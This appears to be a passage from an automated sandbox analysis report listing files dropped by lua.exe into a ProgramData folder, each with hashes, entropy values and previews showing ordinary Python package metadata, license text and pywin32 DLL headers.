C:\ProgramData\ShellExperienceHost\Lib\site-packages\python_engineio-3.13.2.dist-info\LICENSE Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1082
Entropy (8bit):	5.101972680368042
Encrypted:	false
SSDEEP:	24:b3rOJH7H0yxgtAHw1hC09QHOsUv4tk4/+dpoaq/FD:b3SJrlxEDdQHOs52TSaYFD
MD5:	42D0A9E728978F0EEB759C3BE91536B8
SHA1:	B248223C1B4878CBEDDBF9B602142E963B906A8E
SHA-256:	C9E97D3DBC1FBBCDB4F7808B282CD646DB887AFF4F5313FE6BBE8D4C31405A9C
SHA-512:	F200D5CF71790F6D523E8913E1BADB25794AC99845DDAFDE3C40381C5B716163644ACA445B4A22965AC744BC9A7782A87B45150624B966BD96A86C4BAFE5CF0A
Malicious:	false
Preview:	The MIT License (MIT)..Copyright (c) 2015 Miguel Grinberg..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of.the Software, and to permit persons to whom the Software is furnished to do so,.subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF

C:\ProgramData\ShellExperienceHost\Lib\site-packages\python_engineio-3.13.2.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1801
Entropy (8bit):	5.078884107869722
Encrypted:	false
SSDEEP:	48:DYOLOKQILja13LD2gYXQcc0bUXuMrCVG+0YBPa2Z0vN2ZA:DYO9QILja13+gYgpevVF0vTNj
MD5:	237EB49740395A1F2767FFBC46993F94
SHA1:	9D65BCA33BA2C5E75347049712D610E5FA62FB79
SHA-256:	7994B6076C74CA3929C5F3F405DFB4DC36C5339A86B3B9A9FE2B679A5AC9062A
SHA-512:	38AC97C6E975775F9560DD37C476F7CF233205B633D1C64AD5697CE169B67BE4E386160D1BCDBF0FA3EDD80A8E3ADBEA66CA1FD1DE3255AACFBA434BB49640BD
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: python-engineio.Version: 3.13.2.Summary: Engine.IO server.Home-page: http://github.com/miguelgrinberg/python-engineio/.Author: Miguel Grinberg.Author-email: miguelgrinberg50@gmail.com.License: MIT.Platform: any.Classifier: Environment :: Web Environment.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 3.Classifier: Topic :: Internet :: WWW/HTTP :: Dynamic Content.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Requires-Dist: six (>=1.9.0).Provides-Extra: asyncio_client.Requires-Dist: aiohttp (>=3.4) ; extra == 'asyncio_client'.Provides-Extra: client.Requires-Dist: requests (>=2.21.0) ; extra == 'client'.Requires-Dist: websocket-client (>=0.54.0) ; extra == 'client'..python-engineio.===============.... image:

C:\ProgramData\ShellExperienceHost\Lib\site-packages\python_engineio-3.13.2.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3547
Entropy (8bit):	5.621833669700462
Encrypted:	false
SSDEEP:	96:/74JXYV69Xw8CI4WLbauKjMtjhk0oX+PrYI4pJxxFGXMefQTLNkyTXtqsqbqX6ZU:jeYV69Xw8CIfPaFqy0GuYT3zQ5QsqXyU
MD5:	6C0155F3A71BFD30815A11509539E4FF
SHA1:	EDBA00F2C2C85FF0501CB94A375BF20D5AADE1A4
SHA-256:	BECC2668AB05C08E6929C6B25E2E9373B81AA1E38784D2049285C2E78BD42ACD
SHA-512:	36E6E7A642BCE68B0670152C4F568B47CF0B8C00E8A554D843A0F30958A6CE4AA60AB7763E530CFD45E2407531A18234C626905A86C09FB783E42272A74F9156
Malicious:	false
Preview:	engineio/__init__.py,sha256=8C7iSU8wJ-dRG9g4qntM4GdZoNoSa2oWiwRR2k7ctEo,787..engineio/__pycache__/__init__.cpython-37.pyc,,..engineio/__pycache__/asyncio_client.cpython-37.pyc,,..engineio/__pycache__/asyncio_server.cpython-37.pyc,,..engineio/__pycache__/asyncio_socket.cpython-37.pyc,,..engineio/__pycache__/client.cpython-37.pyc,,..engineio/__pycache__/exceptions.cpython-37.pyc,,..engineio/__pycache__/middleware.cpython-37.pyc,,..engineio/__pycache__/packet.cpython-37.pyc,,..engineio/__pycache__/payload.cpython-37.pyc,,..engineio/__pycache__/server.cpython-37.pyc,,..engineio/__pycache__/socket.cpython-37.pyc,,..engineio/__pycache__/static_files.cpython-37.pyc,,..engineio/async_drivers/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..engineio/async_drivers/__pycache__/__init__.cpython-37.pyc,,..engineio/async_drivers/__pycache__/aiohttp.cpython-37.pyc,,..engineio/async_drivers/__pycache__/asgi.cpython-37.pyc,,..engineio/async_drivers/__pycache__/eventlet.cpython-37.pyc,,

C:\ProgramData\ShellExperienceHost\Lib\site-packages\python_engineio-3.13.2.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.816968543485036
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlVii6KRRP+tPCCf7irO5S:RtBMwlViGjWBBwt
MD5:	D25A99ECD1ECB535EE4E31874B0C7B95
SHA1:	B80780FBBF97A5FBF433C4F692E340632EA675F1
SHA-256:	00329EC9A1B2285E43C01344D2C444E69BD6F9B4A414C25F06E873677ADC78FE
SHA-512:	539E072414E6E8AD3BFAEDB0587507443B39826814FB330B57D605FB5FBE61134D3548359F41A14CC63B44E23EF0AA1E62EA1C4A2F3B344BE548F4C2C8143976
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.35.1).Root-Is-Purelib: true.Tag: py2-none-any.Tag: py3-none-any..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\python_engineio-3.13.2.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9
Entropy (8bit):	2.5032583347756456
Encrypted:	false
SSDEEP:	3:uPLm:uPLm
MD5:	E89533F5550BA24A1B3ED44F69292E05
SHA1:	E38DD0CA1CF5D4D474D70CD84BFE32F56310E01D
SHA-256:	BBC3E6362B0264BC1161C5AB34B7BDC2EB50DADB78CCD8BC207DFAD9CF875AE0
SHA-512:	32375B2C15B3ACD55DDF24AAFDB717A02A2FE72E0403D05E39ACD3D1C9525FF0A2ECE3F1AF69ED85BCFCB4021AA238A1E07808C5363203557E9C2AEA7BB41866
Malicious:	false
Preview:	engineio.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\python_socketio-4.6.0.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\python_socketio-4.6.0.dist-info\LICENSE Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1082
Entropy (8bit):	5.101972680368042
Encrypted:	false
SSDEEP:	24:b3rOJH7H0yxgtAHw1hC09QHOsUv4tk4/+dpoaq/FD:b3SJrlxEDdQHOs52TSaYFD
MD5:	42D0A9E728978F0EEB759C3BE91536B8
SHA1:	B248223C1B4878CBEDDBF9B602142E963B906A8E
SHA-256:	C9E97D3DBC1FBBCDB4F7808B282CD646DB887AFF4F5313FE6BBE8D4C31405A9C
SHA-512:	F200D5CF71790F6D523E8913E1BADB25794AC99845DDAFDE3C40381C5B716163644ACA445B4A22965AC744BC9A7782A87B45150624B966BD96A86C4BAFE5CF0A
Malicious:	false
Preview:	The MIT License (MIT)..Copyright (c) 2015 Miguel Grinberg..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of.the Software, and to permit persons to whom the Software is furnished to do so,.subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF

C:\ProgramData\ShellExperienceHost\Lib\site-packages\python_socketio-4.6.0.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1903
Entropy (8bit):	5.119333568157277
Encrypted:	false
SSDEEP:	48:DTZwsQILja13LSnh21NjYXQMCN0b7JMr7+0XBUa2Z0vN2ZA:DTasQILja132QXjYgAJb0PTNj
MD5:	C5F6BB01E11BB60053DD26362727A6D2
SHA1:	6897312D84FD4A50EBC95D56582896D423005BE8
SHA-256:	17A5796F6B19755A2BDD31618A59D1E198DAA9747EBD2CA79A17DC6B5D8E2930
SHA-512:	C0CCC37E5C4F00964E86CED059F40C234F3E097A2D932EC9D65A060020A36C2DACEF68DB63CF0665C67F863CE034BB60BAC998FB35CBC9E3A7C48345407731AB
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: python-socketio.Version: 4.6.0.Summary: Socket.IO server.Home-page: http://github.com/miguelgrinberg/python-socketio/.Author: Miguel Grinberg.Author-email: miguelgrinberg50@gmail.com.License: MIT.Platform: any.Classifier: Environment :: Web Environment.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 3.Classifier: Topic :: Internet :: WWW/HTTP :: Dynamic Content.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Requires-Dist: six (>=1.9.0).Requires-Dist: python-engineio (>=3.13.0).Provides-Extra: asyncio_client.Requires-Dist: aiohttp (>=3.4) ; extra == 'asyncio_client'.Requires-Dist: websockets (>=7.0) ; extra == 'asyncio_client'.Provides-Extra: client.Requires-Dist: requests (>=2.21.0) ; extra == 'client'.Req

C:\ProgramData\ShellExperienceHost\Lib\site-packages\python_socketio-4.6.0.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3581
Entropy (8bit):	5.6596414147676395
Encrypted:	false
SSDEEP:	96:JXx4k7L6WQs4XxE3TjUZR3nFHzeKhbNRwDD5SSMwIDKJ:JXLasyCDIXXh+J
MD5:	E6F2CED550739BCA3174F64448E3B942
SHA1:	AF861F7E06D167BDA38BCC2F4801F2CC600C2FF4
SHA-256:	DE425DB97C9C6F7116F28BEA5035EA0DC3CCA98840892ADEA5B2E91CA19621AA
SHA-512:	D2DB7E51CE4CCF57AA461C28F38555910BC808E6480491C4CAA313EB578A4E61E7328AABAA0E54038502D2DE68BF73E6E0653FA554D0987276DED72390434877
Malicious:	false
Preview:	python_socketio-4.6.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..python_socketio-4.6.0.dist-info/LICENSE,sha256=yel9Pbwfu82094CLKCzWRtuIev9PUxP-a76NTDFAWpw,1082..python_socketio-4.6.0.dist-info/METADATA,sha256=F6V5b2sZdVor3TFhilnR4ZjaqXR-vSynmhfca12OKTA,1903..python_socketio-4.6.0.dist-info/RECORD,,..python_socketio-4.6.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..python_socketio-4.6.0.dist-info/WHEEL,sha256=kGT74LWyRUZrL4VgLh6_g12IeVl_9u9ZVhadrgXZUEY,110..python_socketio-4.6.0.dist-info/top_level.txt,sha256=xWd-HVUanhys_VzQQTRTRZBX8W448ayFytYf1Zffivs,9..socketio/__init__.py,sha256=5uq0rHxS9q6mk709V28By6uO384ia5L_FiujIWtaYBg,1529..socketio/__pycache__/__init__.cpython-37.pyc,,..socketio/__pycache__/asgi.cpython-37.pyc,,..socketio/__pycache__/asyncio_aiopika_manager.cpython-37.pyc,,..socketio/__pycache__/asyncio_client.cpython-37.pyc,,..socketio/__pycache__/asyncio_manager.cpython-37.pyc,,..socketio/__pycache__/asyncio_namesp

C:\ProgramData\ShellExperienceHost\Lib\site-packages\python_socketio-4.6.0.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.816968543485036
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlVitcv6KjP+tPCCf7irO5S:RtBMwlViWZWBBwt
MD5:	D2A91F104288B412DBC67B54DE94E3AC
SHA1:	5132CB7D835D40A81D25A4A1D85667EB13E1A4D3
SHA-256:	9064FBE0B5B245466B2F85602E1EBF835D8879597FF6EF5956169DAE05D95046
SHA-512:	FACDEE18E59E77AEF972A5ACCB343A2EA9DB03F79D226C5827DC4BCDB47D3937FE347CB1F0A2FC48F035643F58737C875FDF1BD935586A98C6966BFA88C7484A
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.34.2).Root-Is-Purelib: true.Tag: py2-none-any.Tag: py3-none-any..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\python_socketio-4.6.0.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9
Entropy (8bit):	2.94770277922009
Encrypted:	false
SSDEEP:	3:Qp:Qp
MD5:	4D8AFF21921D409914C926996F94A153
SHA1:	755CFFB1C1D6D055E7824B67C713064D3175BB81
SHA-256:	C5677E1D551A9E1CACFD5CD0413453459057F16E38F1AC85CAD61FD597DF8AFB
SHA-512:	4310A5F2D4E56159B9022241C7E5FD952CA0F0FCA0EBBE1C6EDE37B95AE77A593D513AA74FF780F38AC401D41579896A4BC6CB90729AB5776A29EFFB0E956362
Malicious:	false
Preview:	socketio.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pythoncom.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	138
Entropy (8bit):	4.649845624570034
Encrypted:	false
SSDEEP:	3:SZ+FlJQcZ6MRxJjZuXyDeEeOnoQjDcVVfGg9n:SZ+FTQcIMjg3OnxX1g9n
MD5:	21536E5C77D37B70A33376BB03551CFD
SHA1:	6C417DAA1FED5C52F6DFD9B002351A3A64B03781
SHA-256:	08246CBB09A1E229E8BAAAA6F86070CB229FBCFC2A83B517B51D5ED412C4CE81
SHA-512:	979397A7A55B183310CE86028984FBEE162618BFF9A7BB4996EA46789718C6C8B54613DE07A110D47E08FDB9E84A20597AB41006CE2169E37B398025EA5048FB
Malicious:	false
Preview:	# Magic utility that "redirects" to pythoncomxx.dll.import pywintypes.pywintypes.__import_pywin32_system_module__("pythoncom", globals()).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pywin32-300.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pywin32-300.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	968
Entropy (8bit):	4.915773513113628
Encrypted:	false
SSDEEP:	24:DlLtcX0u6iQzX1QIRj8ZftRTZft90ZftXZftsZftBZft7nNz6Bx2QAG717:DlLtcX0u6nX1QIRjKxLiPktxNzU8Qvh
MD5:	78DA4A74AF87726679765E088DD6B9E3
SHA1:	9EC88DEE06DA3DD13931E064338AE7A7D2AB7E1D
SHA-256:	55636714C91A63E4C2A9934EB8BBF71B80CC484052A9B0FD76FFCB4FDFA6510C
SHA-512:	CE258DA7012BD8979CFF566B0BD2F284A038CD14A695E0A427DC85678C56BD264F04A45A34C37A5CCB7F79F1957E25456A1F1A4B577D0685115B9F1CA5065434
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: pywin32.Version: 300.Summary: Python for Window Extensions.Home-page: https://github.com/mhammond/pywin32.Author: Mark Hammond (et al).Author-email: mhammond@skippinet.com.au.License: PSF.Platform: UNKNOWN.Classifier: Environment :: Win32 (MS Windows).Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Python Software Foundation License.Classifier: Operating System :: Microsoft :: Windows.Classifier: Programming Language :: Python :: 3.5.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: Implementation :: CPython.Description-Content-Type: text/plain..Python extensions for Microsoft Windows.Provides access to much of the Win32 API, the.ability to create and use COM objects, and the.Pythonwin environment...

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pywin32-300.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	80514
Entropy (8bit):	5.695947972766427
Encrypted:	false
SSDEEP:	768:sdW7p2X1U3KVdujRGu9IOI5Lro0GVt4QxAuqBV25nWjtwy8Lma7E0xzTVIFfg7LZ:sdqf3KVduFr9VI3GVtjafqLrV
MD5:	0EB34CA8751287E1C359F564491CF8BF
SHA1:	A66301E6C2B8AF843234D6E89C980462B3CC66A8
SHA-256:	FD1A1DF538F8F02FD853424287E14E7015F0998338429D6C3999EB3B020C21E2
SHA-512:	6D26417CD32DF66F07BD01CBDC2C3F01C0EB7F45CBD4915BE6AC3BA2D70AD1450FD84401A6DAF6EAAA6CA3CB05A5D7E6AF29CBE8E034F09CB98605CE42F1AAF8
Malicious:	false
Preview:	../../Scripts/__pycache__/pywin32_postinstall.cpython-37.pyc,,..../../Scripts/__pycache__/pywin32_testall.cpython-37.pyc,,..../../Scripts/pywin32_postinstall.py,sha256=pPDHOea9ebbJr1lDT3UT5TuL3PjvyrlBpuBuge9bIaE,24996..../../Scripts/pywin32_testall.py,sha256=TDYPFvs7vJiE0fe3YN-jvF4HAL9S690d5UmTNwgGFgY,3251..PyWin32.chm,sha256=JxpIIx86gtKiEbzMMEcVt2qOEFml_cfOVkiyMcgb8i4,2666406..__pycache__/pythoncom.cpython-37.pyc,,..adodbapi/__init__.py,sha256=3ok3sVS6DQUKQOV01fe1WzzYDdIsOGbudIS_PrOY9CE,2097..adodbapi/__pycache__/__init__.cpython-37.pyc,,..adodbapi/__pycache__/ado_consts.cpython-37.pyc,,..adodbapi/__pycache__/adodbapi.cpython-37.pyc,,..adodbapi/__pycache__/apibase.cpython-37.pyc,,..adodbapi/__pycache__/is64bit.cpython-37.pyc,,..adodbapi/__pycache__/process_connect_string.cpython-37.pyc,,..adodbapi/__pycache__/remote.cpython-37.pyc,,..adodbapi/__pycache__/schema_table.cpython-37.pyc,,..adodbapi/__pycache__/setup.cpython-37.pyc,,..adodbapi/ado_consts.py,sha256=zjUg7mATcQT1xnrWVI17PeWO0L

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pywin32-300.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	106
Entropy (8bit):	5.079407960020318
Encrypted:	false
SSDEEP:	3:RtED7MWcSlVin8gP+tkSrLhheov:RtEMwlVi8gWKSrLhh3v
MD5:	BE7905FA8B3C4786C7C25DC2C7DCE035
SHA1:	5EECC400F246D2ABDFAE89B982D1E3D82E2257A6
SHA-256:	8E61584B0476A22E4380C1A09A7B81F84271A8B3245288C619D989D30CF7E5A2
SHA-512:	E2FDC3861BEAB34D07FC0C46140D80B92FDCC4C909502222A904193F025CF7DDB2D9B5BF3D120B59F173FF5CD1601593AE13F221A366845879401787377798EA
Malicious:	false
Preview:	Wheel-Version: 1.0..Generator: bdist_wheel (0.31.1)..Root-Is-Purelib: false..Tag: cp37-cp37m-win_amd64....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pywin32-300.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1303
Entropy (8bit):	4.396696080684793
Encrypted:	false
SSDEEP:	12:OAZ5je3QCBie5yaI5BZpKSNa+6bCBtu5zrJko4bmKnRTW2Lci3GDvJbS4vS2LSKa:LesZBL/16bCzuB9XQFxV3GDhbS4g5F
MD5:	E571EC9C3C82DE85671A60AE70576587
SHA1:	53D6C91B7D73B94E08083EA3B6594D40D9044959
SHA-256:	4B7901ACD175A60107FBFD2570C6113C43069389ECCC023203FCA880F93C62E0
SHA-512:	F4D3F8EC6F42A175B1806992A4A54A3B0591508335B07D1916FB31A664A0FF585BE2D70772D7516525FC9E6BA8D69C634B73789ABC66D2BA415631E6C2B0D0D9
Malicious:	false
Preview:	PyISAPI_loader._win32sysloader._winxptheme.adodbapi.adsi.authorization.axcontrol.axdebug.axscript.bits.dde.directsound.exchange.exchdapi.ifilter.internet.isapi.mapi.mmapfile.odbc.perfmon.perfmondata.propsys.pythoncom.pythonwin.pywintypes.servicemanager.shell.taskscheduler.timer.win2kras.win32\lib\afxres.win32\lib\commctrl.win32\lib\dbi.win32\lib\mmsystem.win32\lib\netbios.win32\lib\ntsecuritycon.win32\lib\pywin32_bootstrap.win32\lib\pywin32_testutil.win32\lib\pywintypes.win32\lib\rasutil.win32\lib\regcheck.win32\lib\regutil.win32\lib\sspi.win32\lib\sspicon.win32\lib\win32con.win32\lib\win32cryptcon.win32\lib\win32evtlogutil.win32\lib\win32gui_struct.win32\lib\win32inetcon.win32\lib\win32netcon.win32\lib\win32pdhquery.win32\lib\win32pdhutil.win32\lib\win32rcparser.win32\lib\win32serviceutil.win32\lib\win32timezone.win32\lib\win32traceutil.win32\lib\win32verstamp.win32\lib\winerror.win32\lib\winioctlcon.win32\lib\winnt.win32\lib\winperf.win32\lib\winxptheme.win32api.win32clipboard.win32c

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pywin32.pth Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	178
Entropy (8bit):	4.536641638598185
Encrypted:	false
SSDEEP:	3:SgOFQFU7MLWmP/t1IQbT0+MetmY28eRNTFR23LOeNCEndDpkXEF:SgOOFBVP/H7H0+MeZpcF+KeNCEnmEF
MD5:	322BF8D4899FB978D3FAC34DE1E476BB
SHA1:	467808263E26B4349A1FAF6177B007967FBC6693
SHA-256:	4F67FF92AF0EA38BF18AC308EFD976F781D84E56F579C603ED1E8F0C69A17F8D
SHA-512:	D7264690D653AC6ED4B3D35BB22B963AFC53609A9D14187A4E0027528B618C224ED38E225330CEAE2565731A4E694A6146B3214B3DCEE75B053C8AE79F24A9DD
Malicious:	false
Preview:	# .pth file for the PyWin32 extensions.win32.win32\lib.Pythonwin.# And some hackery to deal with environments where the post_install script.# isn't run..import pywin32_bootstrap.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pywin32.version.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5
Entropy (8bit):	1.9219280948873623
Encrypted:	false
SSDEEP:	3:SCv:Ss
MD5:	CDE46522D7B9A40AC01F9361ACD4A90D
SHA1:	BB8AAAC8611A3FA9FF4967877047846F11B680B8
SHA-256:	791F66B6A07D13AF8AF2F243438E6A14BC0C8446987BB603255786E361DCF2F5
SHA-512:	1196D94E8AFA82FE9E22BDDC1FE72A80C19BDBE6A5D71B7864512FEFBF4F8DAC72A8AF348B680F25005940DF866165949BE5D5C1B0491A42E05C180949D53B87
Malicious:	false
Preview:	300..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pywin32_system32\pythoncom37.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	553472
Entropy (8bit):	6.013295184874163
Encrypted:	false
SSDEEP:	12288:tYCbXMotEYbwzP8+QsGZvMYeRCcpIipd/8Fae:tY4XMotEYbwzP80GZeCciI4
MD5:	59296C90A2EB361DCBEF671ABAD742B5
SHA1:	F5558469A56C049CBD8A7E5E15656677A46DE7A1
SHA-256:	4477F2D9C38767CB328A9E92F70D37B670A15E944E8C6064A49A1970BD00617C
SHA-512:	6B8FB678F640462682A2406E6D6CA2988EBA8251098CB108DAC09D11ED5972406C0C88E3C3E37B1A03B69F9E54C828F97391911058C1EF0100C2B2223DD1C998
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q..15y.b5y.b5y.b<.[b?y.b.'.c7y.b.'.c7y.b.'.c!y.b.'.c=y.b.'.c7y.bF..c8y.b...c7y.bF..c<y.b5y.b.x.b.'.cdy.b.'.c4y.b.'.c4y.bRich5y.b........................PE..d...C]._.........." .....8...6......D'........ ..............................`............`.............................................<c...].......0..\....... p...........@..T.......T............................................P...............................text...\|6.......8.................. ..`.rdata...6...P...8...<..............@..@.data...0........h...t..............@....pdata.. p.......r..................@..@.gfids..4.... .......N..............@..@.rsrc...\....0.......P..............@..@.reloc..T....@.......T..............@..B................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pywin32_system32\pywintypes37.dll Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	5.970333410695974
Encrypted:	false
SSDEEP:	3072:485xq7Dn2TYrrC0JumkYmkQISw67M0arnR01:4Ic7Dn2TYrrC0vdmkQISl7JarG
MD5:	77B6875977E77C4619BBB471D5EAF790
SHA1:	F08C3BC5E918C0A197FBFD1B15E7C0491BD5FADE
SHA-256:	780A72BA3215FF413D5A9E98861D8BB87C15C43A75BB81DC985034AE7DCF5EF6
SHA-512:	783939FC97B2445DFE7E21EB6B71711ABA6D85E275E489EDDCC4F20C2ED018678D8D14C9E1856F66E3876F318312D69C22CEE77F9105A72E56A1BE4F3E8A7C2E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6.V.W...W...W.../%..W.......W..b.q..W.......W.......W.......W...5...W..f>...W...5...W...W..!W..V....W..V....W..V....W..Rich.W..........PE..d....]._.........." .........<................z..............................p............`.........................................`z..dG...........P..d.... ...............`.......W..T............................X..................P............................text............................... ..`.rdata..............................@..@.data...h0.......0..................@....pdata....... ......................@..@.gfids..4....@......................@..@.rsrc...d....P......................@..@.reloc.......`......................@..B................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests-2.25.1.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests-2.25.1.dist-info\LICENSE Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10142
Entropy (8bit):	4.382049701782505
Encrypted:	false
SSDEEP:	192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLhx:U9vlKM1zJlFvmNz5Vrr
MD5:	34400B68072D710FECD0A2940A0D1658
SHA1:	57AED0B0F74E63F6B85CCE11BCE29BA1710B422B
